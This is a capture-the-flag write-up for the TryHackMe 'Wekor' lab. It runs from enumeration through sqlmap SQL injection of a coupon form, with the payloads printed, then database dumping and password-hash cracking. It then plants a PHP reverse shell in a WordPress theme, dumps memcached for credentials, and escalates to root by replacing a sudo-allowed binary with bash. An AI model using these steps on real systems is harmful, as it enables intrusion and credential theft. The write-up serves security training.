Wekor Writeup

TryHackMe: Wekor created by @ustoun0

The creator give us many hints on this room, starting with the room description, notes and flag hints.

Room decription:

CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services 😉

Notes

Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you
enjoy it as it is my first time ever creating something like this !

This CTF is focused primarily on enumeration, better understanding of services
and thinking out of the box for some parts of this machine.

Feel free to ask any questions…It’s okay to be confused in some parts of the
box 😉

Just a quick note, Please use the domain : “wekor.thm” as it could be useful
later on in the box 😉

Flag hints

What is the user flag?

Hint: Look at what ports are open 🙂
what
what thing
More (Definitions, Synonyms, Translation)

What is the root flag?
Hint: Sudo -l

Let’s get down to business, shall we?

Before start, add wekor.thm domain to /etc/hosts

echo "[IP]      wekor.thm" | sudo tee -a /etc/hosts

Enumeration

sudo nmap -v -sS -sV -T4 --open -Pn -p- wekor.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are 2 open ports. Port 22 is used for SSH and port 80 for Apache Web Server.

I try access FTP with anonoymous account, but anonymous account was disabled.

Retrieve webserver starter page.

curl -v http://wekor.thm/

*   Trying 10.10.17.203:80...
* Connected to wekor.thm (10.10.17.203) port 80 (#0)
> GET / HTTP/1.1
> Host: wekor.thm
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 08 Mar 2021 20:51:10 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Sun, 12 Jul 2020 00:29:54 GMT
< ETag: "17-5aa33ac47e480"
< Accept-Ranges: bytes
< Content-Length: 23
< Content-Type: text/html
<
Welcome Internet User!
* Connection #0 to host wekor.thm left intact

Exploring the team site

feroxbuster -q -u http://wekor.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -x php,html,txt

200       10l       20w      188c http://wekor.thm/robots.txt
200        7l       31w      190c http://wekor.thm/comingreallysoon/index.html
200        1l        3w       23c http://wekor.thm/index.html

Let’s check what we found.

curl http://wekor.thm/comingreallysoon/index.html

Welcome Dear Client!

We've setup our latest website on /it-next, Please go check it out!

If you have any comments or suggestions, please tweet them to @faketwitteraccount!

Thanks a lot !
* Connection #0 to host wekor.thm left intact
curl http://wekor.thm/robots.txt

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting

Opening /it-next in the browser.

What we have at http://wekor.thm/it-next? It’s look like some html template,but, internal links are PHP pages.

Maybe the SQLi from room descriptions canbe somewhere hidded here.

I spend many hours fuzzing directories, but the rabbit hole was always near.

SQLMap exploration

sqlmap -u http://wekor.thm/it-next --batch --dbms=mysql --risk 3 --crawl=4 --forms

After some time SQLMap show that SQL injection vulnerability has been detected against ‘wekor.thm’ as below.

POST http://wekor.thm/it-next/it_cart.php
POST data: coupon_code=&apply_coupon=Apply%20Coupon
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: coupon_code=&apply_coupon=Apply%20Coupon] (Warning: blank fields detected): coupon_code=&apply_coupon=Apply Coupon
do you want to fill blank fields with random values? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: coupon_code (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: coupon_code=JlIv' OR NOT 7432=7432#&apply_coupon=Apply Coupon

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: coupon_code=JlIv' AND GTID_SUBSET(CONCAT(0x71716b7671,(SELECT (ELT(9501=9501,1))),0x7170706271),9501)-- vrEO&apply_coupon=Apply Coupon

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: coupon_code=JlIv' AND (SELECT 6261 FROM (SELECT(SLEEP(5)))PtyT)-- HgoQ&apply_coupon=Apply Coupon

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: coupon_code=JlIv' UNION ALL SELECT NULL,CONCAT(0x71716b7671,0x7a4942504f474f495461514f43644c4a6e566c644a695
852787450507557784a61796c5356497a6d,0x7170706271),NULL#&apply_coupon=
Apply Coupon

Now let’s look what databases whe have

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" --dbs

[...]
[16:23:33] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress

[16:23:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/wekor.thm'

[*] ending @ 16:23:33 /2021-03-08/

We have two databases, one is coupons and other other is wordpress. Let’s dumpthose databases and see if we can find some credentials, and where are thewordpress installed.

sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables

[...]
Database: coupons
[1 table]
+---------------+
| valid_coupons |
+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables --dump

[...]
Table: valid_coupons
[1 entry]
+----+--------+---------------+
| id | coupon | expire_date   |
+----+--------+---------------+
| 1  | 12345  | doesnotexpire |
+----+--------+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress --tables

[...]
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress -T wp_users --dump

[...]
Database: wordpress
Table: wp_users
[4 entries]
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID   | user_url                        | user_pass                          | user_email        | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key                           |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1    | http://site.wekor.thm/wordpress | $P$____________HASH_______31B. | [email protected]   | admin      | 0           | admin        | admin         | 2021-01-21 20:33:37 | <blank>                                       |
| 5743 | http://jeffrey.com              | $P$_______HASH________j10 | [email protected] | wp_jeffrey | 0           | wp jeffrey   | wp_jeffrey    | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com                 | $P$B_________HASH________SV/ | [email protected]    | wp_yura    | 0           | wp yura      | wp_yura       | 2021-01-21 20:35:27 | <blank>                                       |
| 5873 | http://eagle.com                | $P$B________HASH_______6QY/ | [email protected]   | wp_eagle   | 0           | wp eagle     | wp_eagle      | 2021-01-21 20:36:11 | <blank>                                       |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+

So, now we have credentials and the wordpress address at site.wekor.thm.

Let’s add site.wekor.thm to /etc/hosts file and see how it appear.

echo "[IP]      site.wekor.thm" | sudo tee -a /etc/hosts

We already have some credentials, next step is using john with the wordlist rockyou to crack those hashes.

cat hashes

admin:$P$____________HASH_______31B.
wp_jeffrey:$P$_______HASH________j10
wp_yura:$P$B_________HASH________SV/
wp_eagle:$P$B________HASH_______6QY/
john --wordlist=/usr/share/wordlists/rockyou.txt ./hashes

Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Remaining 1 password hash
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:26 DONE (2021-03-08 18:25) 0g/s 28315p/s 28315c/s 28315C/s [email protected]@@!!!..*7¡Vamos!
Session completed

After a while, john broke three hashes.

john  ./hashes  --show

wp_jeffrey:PASSWORD_TEXT
wp_yura:PASSWORD_TEXT
wp_eagle:PASSWORD_TEXT

3 password hashes cracked, 1 left

Yura is the wordpress admin. Next step is install the reverse shell inside wordpress.

Change the host IP in the file
/usr/share/webshells/php/php-reverse-shell.php with your VPN IP.

After that open wordpress in “Theme Editor”, select the file “404 Template”.

Replace the content of the file with the reverse shell file and
save.

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Open local netcat and make a request to stabilish the connection.

Open one terminal window and set netcat.

nc -nvlp 1234

Open other terminal and call open some page that does not exit.

curl http://site.wekor.thm/wordpress/index.php/xyz

Now we have a shell session.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ groups
www-data

What users we have?

[email protected]:/tmp$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
Orka:x:1001:1001::/home/Orka:/bin/bash

Only Orka and root are have shell config.

Looking for open ports you can find something running in port 11211.

netstat -lptu

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 localhost:mysql         *:*                     LISTEN      -
tcp        0      0 localhost:11211         *:*                     LISTEN      -
tcp        0      0 *:ssh                   *:*                     LISTEN      -
tcp        0      0 localhost:ipp           *:*                     LISTEN      -
tcp        0      0 localhost:3010          *:*                     LISTEN      -
tcp6       0      0 [::]:http               [::]:*                  LISTEN      -
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -
tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN      -
udp        0      0 *:ipp                   *:*                                 -
udp        0      0 *:mdns                  *:*                                 -
udp        0      0 *:43825                 *:*                                 -
udp        0      0 *:bootpc                *:*                                 -
udp6       0      0 [::]:mdns               [::]:*                              -
udp6       0      0 [::]:50771              [::]:*             

After searching in Google we discover that is a memcached server. Some moresearches and we got the command to dump the cached data.

/usr/share/memcached/scripts/memcached-tool localhost:11211 dump

Dumping memcache contents
  Number of buckets: 1
  Number of items  : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
---->PASSWORD_TEXT<-----
add email 0 1615235112 14
[email protected]
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka

Ok, now we have Orka password.

As Orka, what you can do?

sudo -l

[sudo] password for Orka:
Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
[email protected]:/tmp$ ls -lha /home/Orka/Desktop/bitcoin
-rwxr-xr-x 1 root root 7.6K Jan 23 15:23 /home/Orka/Desktop/bitcoin
ls -la /home/Orka/Desktop/
total 2176
drwxrwxr-x  2 Orka Orka    4096 Mar  8 17:52 .
drwxr-xr-- 19 Orka Orka    4096 Mar  8 17:49 ..
-rwxr-xr-x  1 Orka Orka 1109564 Mar  8 17:52 bitcoin

You can execute bitcoin as sudo. Also you can’t change bitcoin but, you are canchange the Desktop folder. Let’s replace the bitcoin with bash and get the root.

[email protected]:/tmp$ cd /home/Orka/
[email protected]:~$ mv Desktop d
[email protected]:~$ mkdir Desktop
[email protected]:~$ cp /bin/bash ./Desktop/bitcoin
[email protected]:~$ sudo /home/Orka/Desktop/bitcoin
[email protected]:~# cat /root/root.txt
FLAG_TEXT
[email protected]:~# cat /home/Orka/user.txt
FLAG_TEXT